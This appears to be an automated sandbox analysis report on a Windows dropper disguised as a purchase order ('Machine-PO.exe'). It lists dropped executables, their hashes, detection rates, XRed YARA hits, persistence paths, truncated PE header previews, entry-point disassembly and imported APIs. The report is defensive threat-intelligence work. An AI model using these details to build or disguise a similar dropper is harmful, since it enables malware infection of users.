                                                                                                              SHA1:A2A84AE77B7C13A07E1C42686BA50E6DEA77DD75
                                                                                                              SHA-256:651FF3510AAEEF54972E1C629826E14E96339D97C274C8BB4455F06ACD37AA19
                                                                                                              SHA-512:10EF9DFC95B064A3914B2575CC729167BA09725728A703E1065528BFB5B58032547B6C58D2377BDDB808217BB191F922EBA3450FF0354EE306C7D8EA6EF4A402
                                                                                                              Malicious:false
                                                                                                              Preview:L..................F.@.. ...BE...Z....O..Z....O..Z............................:..DG..Yr?.D..U..k0.&...&.......y.Yd...|....Z.......Z......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.Y$S..........................d...A.p.p.D.a.t.a...B.V.1......Y"S..Roaming.@......EW)B.Y"S........................../...R.o.a.m.i.n.g.....V.1......Y&S..Windata.@......Y&S.Y&S....*.........................W.i.n.d.a.t.a.....`.2......Y'S .TCPKPY.exe..F......Y'S.Y'S..........................$..T.C.P.K.P.Y...e.x.e.......a...............-.......`..................C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.T.C.P.K.P.Y...e.x.e.*.".C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll............................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\._cache_Machine-PO.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1436672
                                                                                                              Entropy (8bit):7.208680290347871
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:W4lavt0LkLL9IMixoEgeaXA0Cw9ysPkOgDOWabKOq5qfbmp9Oe4q9MmCS:hkwkn9IMHeaXA0COysPklzMKGmPyaPCS
                                                                                                              MD5:3BF7444911198B54B1E8AB53F236683E
                                                                                                              SHA1:84E7DB884577DF03C7A4FEB54651985D76856C16
                                                                                                              SHA-256:78BCE6367FA6F47F8FF5F2E72A4F91065AD36F470860DA23542D450EFD1F896E
                                                                                                              SHA-512:551E4A88495F9E18C226E27CC342E968C659EC93AC5E7ADF4A23F1B0ED3D915FAE3BCE61E0845F5DB7882A0DFFF451F3D3839D00A03AE984E80BFE2E7AB8953F
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 61%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....._g.........."..........(.......k............@..........................P............@...@.......@.....................lk..|....@...V...................... l..................................p'..@...............X............................text...t........................... ..`.rdata..j...........................@..@.data...4........b..................@....rsrc....V...@...X..................@..@.reloc..b............F..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\Machine-PO.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1436672
                                                                                                              Entropy (8bit):7.208680290347871
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:W4lavt0LkLL9IMixoEgeaXA0Cw9ysPkOgDOWabKOq5qfbmp9Oe4q9MmCS:hkwkn9IMHeaXA0COysPklzMKGmPyaPCS
                                                                                                              MD5:3BF7444911198B54B1E8AB53F236683E
                                                                                                              SHA1:84E7DB884577DF03C7A4FEB54651985D76856C16
                                                                                                              SHA-256:78BCE6367FA6F47F8FF5F2E72A4F91065AD36F470860DA23542D450EFD1F896E
                                                                                                              SHA-512:551E4A88495F9E18C226E27CC342E968C659EC93AC5E7ADF4A23F1B0ED3D915FAE3BCE61E0845F5DB7882A0DFFF451F3D3839D00A03AE984E80BFE2E7AB8953F
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 61%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....._g.........."..........(.......k............@..........................P............@...@.......@.....................lk..|....@...V...................... l..................................p'..@...............X............................text...t........................... ..`.rdata..j...........................@..@.data...4........b..................@....rsrc....V...@...X..................@..@.reloc..b............F..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:Microsoft Excel 2007+
                                                                                                              Category:dropped
                                                                                                              Size (bytes):18387
                                                                                                              Entropy (8bit):7.523057953697544
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                              MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                              SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                              SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                              SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                              Malicious:false
                                                                                                              Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............
                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):165
                                                                                                              Entropy (8bit):1.5231029153786204
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:WH25nJFV:WH2/
                                                                                                              MD5:FB5ABAA34A0BB284B640327B9745AAAC
                                                                                                              SHA1:7E1063A0F1DE0E83424399F104C1D3752BFAECDE
                                                                                                              SHA-256:12464C713EE2E0CBBDCF98FACF8AC034D34A9F4D221D7BB7A5C7D458AAEC0AF9
                                                                                                              SHA-512:0FB235A4475D72D9BB6A195F6DFE471152B91F6DE0967D4174298D0A3C228BFF0ED57F0A5F388833A7793BD90F6CA0D5A974D21D795938D8D96C079AB5D99294
                                                                                                              Malicious:false
                                                                                                              Preview:.user ..h.u.b.e.r.t. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):771584
                                                                                                              Entropy (8bit):6.638013190381294
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                              MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                              SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                              SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                              SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\PIVFAGEAAV\~$cache1, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\PIVFAGEAAV\~$cache1, Author: Joe Security
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 92%
                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1835008
                                                                                                              Entropy (8bit):4.3723211049838655
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:qFVfpi6ceLP/9skLmb0gyWWSPtaJG8nAge35OlMMhA2AX4WABlguNciL:CV1uyWWI/glMM6kF7qq
                                                                                                              MD5:BF6BAB80C6C5C569ABA3DC7073DB992F
                                                                                                              SHA1:6D6D5230A93D118805CC295CCDD21138E077BECD
                                                                                                              SHA-256:D4FC35EC6E1F64E21E940C4EDBC38517F614A1EA01382029A72823A5633EFB9D
                                                                                                              SHA-512:97EFAA8875D0E41549F77DB968D7887A56937B83C0D2A32002384E72030A12C7F2680B955C86C2E69BA3B926F28E56279D9AED7C7FEE25D4825BE703DBBB50FB
                                                                                                              Malicious:false
                                                                                                              Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...*.Z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):7.058935933771513
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 92.57%
                                                                                                              • Win32 Executable Borland Delphi 7 (665061/41) 6.16%
                                                                                                              • Windows ActiveX control (116523/4) 1.08%
                                                                                                              • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                              File name:Machine-PO.exe
                                                                                                              File size:2'208'256 bytes
                                                                                                              MD5:a6bd561711ea8c2064c20644cceee074
                                                                                                              SHA1:cb330a1ad78387bdc401142feecac763ac63d3d9
                                                                                                              SHA256:e6f8edcbe69419008b7e54f8554fc1aec66208de10c26a982d624ea91aed8092
                                                                                                              SHA512:62d55f02d14d122b10a0ef08dfa5ffa950f4153863246e3f6e6a6bd1a4d1c63321c7c4e9fb4306c0535e73389d764cc0646c0821a62fd50a2896ec49f205490b
                                                                                                              SSDEEP:49152:AnsHyjtk2MYC5GDokwkn9IMHeaXA0COysPklzMKGmPyaPCSO:Ansmtk2aCdnV/MOKpPCt
                                                                                                              TLSH:3AA5CF62B3D58172C2735236AC3BA356AC3BBE191D34B54F3FE42E1DAE35341151A2A3
                                                                                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                              Icon Hash:2eec8e8cb683b9b1
                                                                                                              Entrypoint:0x49ab80
                                                                                                              Entrypoint Section:CODE
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                              DLL Characteristics:
                                                                                                              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:332f7ce65ead0adfb3d35147033aabe9
                                                                                                              Instruction
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              add esp, FFFFFFF0h
                                                                                                              mov eax, 0049A778h
                                                                                                              call 00007F9B60D2119Dh
                                                                                                              mov eax, dword ptr [0049DBCCh]
                                                                                                              mov eax, dword ptr [eax]
                                                                                                              call 00007F9B60D74AE5h
                                                                                                              mov eax, dword ptr [0049DBCCh]
                                                                                                              mov eax, dword ptr [eax]
                                                                                                              mov edx, 0049ABE0h
                                                                                                              call 00007F9B60D746E4h
                                                                                                              mov ecx, dword ptr [0049DBDCh]
                                                                                                              mov eax, dword ptr [0049DBCCh]
                                                                                                              mov eax, dword ptr [eax]
                                                                                                              mov edx, dword ptr [00496590h]
                                                                                                              call 00007F9B60D74AD4h
                                                                                                              mov eax, dword ptr [0049DBCCh]
                                                                                                              mov eax, dword ptr [eax]
                                                                                                              call 00007F9B60D74B48h
                                                                                                              call 00007F9B60D1EC7Bh
                                                                                                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa0000 | 0x2a42 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb0000 | 0x170930 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa5000 | 0xa980 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0xa4018 | 0x21 | .rdata
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xa4000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x99bec | 0x99c00 | 33fbe30e8a64654287edd1bf05ae7c8c | False | 0.5141641260162602 | data | 6.572957870355296 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0x9b000 | 0x2e54 | 0x3000 | 1f5e19e7d20c1d128443d738ac7bc610 | False | 0.453125 | data | 4.854620797809023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0x9e000 | 0x11e5 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xa0000 | 0x2a42 | 0x2c00 | 21ff53180b390dc06e3a1adf0e57a073 | False | 0.3537819602272727 | data | 4.919333216027082 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xa3000 | 0x10 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xa4000 | 0x39 | 0x200 | a92cf494c617731a527994013429ad97 | False | 0.119140625 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J" | 0.7846201577093705 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0xa5000 | 0xa980 | 0xaa00 | dcd1b1c3f3d28d444920211170d1e8e6 | False | 0.5899816176470588 | data | 6.674124985579511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0xb0000 | 0x170930 | 0x170a00 | 20093491ea45130a81761c04a0081dce | False | 0.642772841429298 | data | 7.161512057996996 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0xb0dc8 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | | | 0.38636363636363635
RT_CURSOR | 0xb0efc | 0x134 | data | | | 0.4642857142857143
RT_CURSOR | 0xb1030 | 0x134 | data | | | 0.4805194805194805
RT_CURSOR | 0xb1164 | 0x134 | data | | | 0.38311688311688313
RT_CURSOR | 0xb1298 | 0x134 | data | | | 0.36038961038961037
RT_CURSOR | 0xb13cc | 0x134 | data | | | 0.4090909090909091
RT_CURSOR | 0xb1500 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | | | 0.4967532467532468
RT_BITMAP | 0xb1634 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066
RT_BITMAP | 0xb1804 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | | | 0.46487603305785125
RT_BITMAP | 0xb19e8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066
RT_BITMAP | 0xb1bb8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39870689655172414
RT_BITMAP | 0xb1d88 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.4245689655172414
RT_BITMAP | 0xb1f58 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5021551724137931
RT_BITMAP | 0xb2128 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5064655172413793
RT_BITMAP | 0xb22f8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105
RT_BITMAP | 0xb24c8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5344827586206896
RT_BITMAP | 0xb2698 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105
RT_BITMAP | 0xb2868 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.4870689655172414
RT_ICON | 0xb2950 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.36350844277673544
RT_ICON | 0xb39f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 8192 | Turkish | Turkey | 0.2101313320825516
RT_DIALOG | 0xb4aa0 | 0x52 | data | | | 0.7682926829268293
RT_STRING | 0xb4af4 | 0x358 | data | | | 0.3796728971962617
RT_STRING | 0xb4e4c | 0x428 | data | | | 0.37406015037593987
RT_STRING | 0xb5274 | 0x3a4 | data | | | 0.40879828326180256
RT_STRING | 0xb5618 | 0x3bc | data | | | 0.33472803347280333
RT_STRING | 0xb59d4 | 0x2d4 | data | | | 0.4654696132596685
RT_STRING | 0xb5ca8 | 0x334 | data | | | 0.42804878048780487
RT_STRING | 0xb5fdc | 0x42c | data | | | 0.42602996254681647
RT_STRING | 0xb6408 | 0x1f0 | data | | | 0.4213709677419355
RT_STRING | 0xb65f8 | 0x1c0 | data | | | 0.44419642857142855
RT_STRING | 0xb67b8 | 0xdc | data | | | 0.6
RT_STRING | 0xb6894 | 0x320 | data | | | 0.45125
RT_STRING | 0xb6bb4 | 0xd8 | data | | | 0.5879629629629629
RT_STRING | 0xb6c8c | 0x118 | data | | | 0.5678571428571428
RT_STRING | 0xb6da4 | 0x268 | data | | | 0.4707792207792208
RT_STRING | 0xb700c | 0x3f8 | data | | | 0.37598425196850394
RT_STRING | 0xb7404 | 0x378 | data | | | 0.41103603603603606
RT_STRING | 0xb777c | 0x380 | data | | | 0.35379464285714285
RT_STRING | 0xb7afc | 0x374 | data | | | 0.4061085972850679
RT_STRING | 0xb7e70 | 0xe0 | data | | | 0.5535714285714286
RT_STRING | 0xb7f50 | 0xbc | data | | | 0.526595744680851
RT_STRING | 0xb800c | 0x368 | data | | | 0.40940366972477066
RT_STRING | 0xb8374 | 0x3fc | data | | | 0.34901960784313724
RT_STRING | 0xb8770 | 0x2fc | data | | | 0.36649214659685864
RT_STRING | 0xb8a6c | 0x354 | data | | | 0.31572769953051644
RT_RCDATA | 0xb8dc0 | 0x44 | data | | | 0.8676470588235294
RT_RCDATA | 0xb8e04 | 0x10 | data | | | 1.5
RT_RCDATA | 0xb8e14 | 0x15ec00 | PE32 executable (GUI) Intel 80386, for MS Windows | | | 0.539484977722168
RT_RCDATA | 0x217a14 | 0x3 | ASCII text, with no line terminators | Turkish | Turkey | 3.6666666666666665
RT_RCDATA | 0x217a18 | 0x3c00 | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | Turkish | Turkey | 0.54296875
RT_RCDATA | 0x21b618 | 0x64c | data | | | 0.5998759305210918
RT_RCDATA | 0x21bc64 | 0x153 | Delphi compiled form 'TFormVir' | | | 0.7522123893805309
RT_RCDATA | 0x21bdb8 | 0x47d3 | Microsoft Excel 2007+ | Turkish | Turkey | 0.8675150921846957
RT_GROUP_CURSOR | 0x22058c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25
RT_GROUP_CURSOR | 0x2205a0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25
RT_GROUP_CURSOR | 0x2205b4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x2205c8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x2205dc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x2205f0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x220604 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_ICON | 0x220618 | 0x14 | data | Turkish | Turkey | 1.1
RT_VERSION | 0x22062c | 0x304 | data | Turkish | Turkey | 0.42875647668393785
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll | RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
kernel32.dll | lstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, 